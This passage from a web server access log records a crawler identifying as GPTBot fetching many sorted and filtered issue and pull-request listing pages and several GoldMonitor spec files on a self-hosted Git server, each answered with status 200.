(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:19:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:19:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:19:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:19:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:19:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:19:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:19:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:19:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:58 +0000] - 200 